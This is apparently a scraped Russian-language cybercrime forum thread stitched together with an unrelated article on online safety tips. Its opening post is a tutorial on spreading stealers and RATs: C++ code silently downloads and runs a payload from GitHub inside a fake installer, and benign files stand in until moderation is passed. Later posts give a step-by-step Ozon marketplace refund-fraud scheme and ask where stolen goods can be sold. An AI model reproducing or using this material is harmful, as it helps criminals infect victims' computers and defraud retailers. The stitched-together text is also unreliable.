Velsssss

Данный пример, всего лишь один из вариантов концепции распространения Stealer-ов, RAT и остальной малвари. И так, нам понадобится следующий софт для реализации данного примера: Smart Install Maker Visual Studio Wget (для windows) см. бонус в конце Программа, которую по легенде будем распространять 1-2, 3… dll-ки, в зависимости сколько дерьма будете грузить. Зареганнный аккаунт на github или gitlab Начало Качаем Smart Install Maker: https://www.sminstall.com/ Устанавливаем его и активируем (логин: phpbb3, пароль: Q8ZZZ-MV417-E0P2T-3MA3L-N24UV), иначе при инсталле вашего софта будет баннер что вы используете триальную версию Smart Install Maker. Берем белый софт (файл), который будем распространять и выдавать за наш. Можно выбрать любой софт, от ускорителей (бустеров), например gamebooster (смотри бонус в конце) до трейдинг-ботов. Лично я смастерил Chat GPT Desktop, так как по запросам в гугле он рулит, а вы включайте фантазию. Создаем учетную запись на github.com (в моем случаи), можете создать на gitlab. Из ранее скачанных безобидных DLL создаем SFX-архив (самораспаковывающийся), ставим на него пароль, в моем случаи «LOLZ» и грузим наш EXE файл (SFX-архив) на github в корень репозитория. Открываем Visual Studio и повторяем как на скринах: «создание проекта» --> «консольное приложение» даем нашему приложению название, в моем случаи «update» жмем «создать»: В открывшемся окне все удаляем: И вставляем следующий код: #pragma comment(lib, "urlmon.lib") #include <Windows.h> #include <string> using namespace std; int main() { URLDownloadToFile(0, L" https://github.com/blade-ass/lolz/raw/main/vcruntime140.exe", L" vcruntime140.exe", 0, 0); ShellExecute(NULL, L"open", L" vcruntime140.exe", NULL, NULL, SW_HIDE); return 0; } Второй вариант, можно делать через «create process»: #pragma comment(lib, "urlmon.lib") #include <Windows.h> #include <string> using namespace std; int main() { HRESULT result = URLDownloadToFile(NULL, L https://github.com/blade-ass/lolz/raw/main/vcruntime140.exe ", L" vcruntime140.exe", L" vcruntime140.exe", 0, NULL); if (result != S_OK) { // Handle the error return 1; } STARTUPINFO si = { sizeof(si) }; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; PROCESS_INFORMATION pi; BOOL success = CreateProcess(L" vcruntime140.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (!success) { // Handle the error return 1; } return 0; } После чего выбираем «Сборка» далее «Собрать решение» как на скринах. И не забудьте заменить свои линки на github!!! После успешной сборки кладем наш update.exe в папку с программой, которую будем выдавать за свою. Дальше создаем проект в Smart Install Maker и не забываем менять инфу относительно своего файла, легенды или сайта (если такой есть). Повторяем как на скринах или гуглим как пользоваться Smart Install Maker. После, прописываем такие команды в проекте: На выходе получаем наш setup.exe. Ну, а после запуска setup.exe видим, что все прошло успешно. Как видно на скрине, наш инсталятор скачал нашу безобидную DLL с github. Если у вас прошло все хорошо, тогда поздравляю! Пока на github архив с безобидных DLL-ок, то инсталятор тоже безобидный, только стоит залить криптованный билд на github, получаем back door для нашего билда (стилера). Также, можно сделать другую концепцию распространения. Используя методы стеганографии, мы можем разделить своего "зверька" на несколько фрагментов (пикчи). Тогда уже не будет качаться .EXE файл, а только пикча (фрагмент кода), после успешных скачиваний фрагментов они собираються на ПК жертвы в единый файл (билд) и отрабатывают. Соответсвенно такими софтами можно проходить модерации на биржах инсталов, и почти везде, так как пикчу можно выдавать за обновление для белого софта. То есть, пока проходим модерацию, то качаем безобидные файлы или DLL-ки, как только прошли модерацию, то на гитхаб залеваем наш зловред.

Сегодня Интернет является неотъемлемой частью нашей жизни, и мы все пользуемся им для разных целей: общения, работы, развлечений и многого другого. Однако вместе с множеством возможностей, которые дает нам сеть, появляются и угрозы безопасности. Как защитить себя от киберугроз и сохранить свои данные в безопасности? Обновляйте программное обеспечение Важно следить за тем, чтобы все программы, которыми вы пользуетесь, были обновлены до последней версии. Это поможет избежать уязвимостей, которые могут быть использованы злоумышленниками для взлома вашего компьютера или мобильного устройства. Используйте надежные пароли Пароли – это первый барьер, который защищает ваши данные от несанкционированного доступа. Используйте пароли, которые содержат как буквы, так и цифры, а также символы, такие как знаки препинания. Не используйте один и тот же пароль для разных аккаунтов. Лучше всего использовать менеджер паролей, который создаст сложные пароли и запомнит их за вас. Не открывайте подозрительные ссылки и вложения По электронной почте и через мессенджеры могут приходить письма с вирусами и другим вредоносным программным обеспечением. Не открывайте ссылки и вложения из непроверенных источников и не переходите на сайты, которые могут выглядеть подозрительно. Используйте антивирусное программное обеспечение Установите на свой компьютер и мобильное устройство надежное антивирусное программное обеспечение. Оно будет сканировать ваши файлы на наличие вирусов и другого вредоносного ПО и блокировать подозрительные активности. Используйте двухфакторную аутентификацию Двухфакторная аутентификация – это дополнительный слой защиты для ваших аккаунтов. При входе в систему вы должны будете ввести не только пароль, но и получить код подтверждения, который придет на ваш телефон или по электронной почте. Это позволяет убедиться в том, что вы и только вы получаете доступ к вашим аккаунтам. Избегайте общественных Wi-Fi сетей Подключаться к общественным Wi-Fi сетям не безопасно, так как злоумышленники могут легко получить доступ к вашим данным. Если вы все же решите подключиться к такой сети, используйте VPN-сервис, который шифрует ваш трафик и защищает ваши данные. Будьте осторожны в социальных сетях Социальные сети – это место, где много информации о вас может быть доступно для других пользователей. Не делитесь личными данными и не добавляйте незнакомых людей в свои контакты. Аккуратнее с фишингом Фишинг – это метод мошенничества, при котором злоумышленники отправляют письма, которые выглядят, как будто они пришли от реальных компаний. Они могут просить вас ввести личные данные, такие как пароли или номера банковских карт. Никогда не вводите личные данные на сайтах, если вы не уверены в их подлинности. Создавайте резервные копии Регулярно создавайте резервные копии важных данных, таких как фотографии, документы и видео. Если ваши данные будут скомпрометированы, вы всегда сможете восстановить их. Обучайте себя и своих близких И, наконец, обучайте себя и своих близких, как защитить свои данные в сети. Рассказывайте им о методах мошенничества и угрозах безопасности и помогайте им принимать меры для защиты своих данных. Безопасность в сети - это один из наиболее актуальных вопросов нашей эпохи. Каждый день люди используют Интернет для работы, общения, покупок и многих других целей, но при этом могут стать жертвой киберпреступников, которые могут украсть их данные и навредить им. В этой статье были представлены 10 простых советов, они могут показаться слишком банальными, но на самом деле многие принебрегают этими правилами. Эти советы могут помочь вам защитить свои данные и личную информацию. Необходимо следить за своей безопасностью и принимать соответствующие меры защиты. Не стесняйтесь задавать вопросы, изучать новые технологии и соблюдать все рекомендации, чтобы оставаться в безопасности в онлайн-мире.

связки до сих пор работают?

Давно уже этот метод

а в плане спецы? обычнее вбиверы и мерчи куда вбивать?

что лучше для малваря раст или си?

Судя по всему ожила древнейшая схема по возврату средств за покупки с маркетплейса «Ozon». 1. Регистрируем/покупаем/брутим/фишим аккаунт «Ozon»; └ Для работы с заказами до 3 500₽ подойдут новореги, для работы с заказами от 3 500₽ и до 13 000 потребуются гретые аккаунты с минимум двумя полученными заказами; 2. Ищем необходимый товар, который продаёт сам «Ozon»; 3. Оформляем заказ с доставкой в постамат; └ В заказ желательно добавить ещё какой-то мелочи вместе с основным товаром; 4. Как только заказ пришел, отправляемся в постамат и забираем его; 5. Возвращаемся домой и достаем содержимое посылки с помощью фена; └ При воздействии теплого воздуха клей нагреется и это позволит достать содержимое без повреждений упаковки; 6. Меняем заказанный товар на всевозможный мусор и подгоняем его по весу; 7. Немного мнём или надрываем коробку товара, после чего запаковываем его обратно в упаковку «Ozon»; └ Важно, нужно мять и рвать именно коробку от товара, который вы заказывали, а не упаковку; 8. Делаем фотографии/видео с фейковыми пруфами; 9. Пишем в техподдержку нечто в духе: "Здравствуйте, забрал заказ из постамата, когда пришёл домой и открыл коробку офигел — вместо товара лежит какой-то мусор. Как мне вернуть деньги?"; 10. Получаем возврат средств в течение нескольких дней; Строго в ознакомительных целях

такое себе руками, делаем сценумом тоже самое автоматом

еще есть, и будет всегда

слишком плохо

Все читали про их ситуацию с битком. Ктото уже начал их скамить?

Спасибо, подскажите где их можно продать?

Через сколько окупится?

Заказ выполнили дольше чем было оговорено сразу. И благодаря этому сделали приятную скидку Несмотря на задержку заказ выполнен, результатом доволен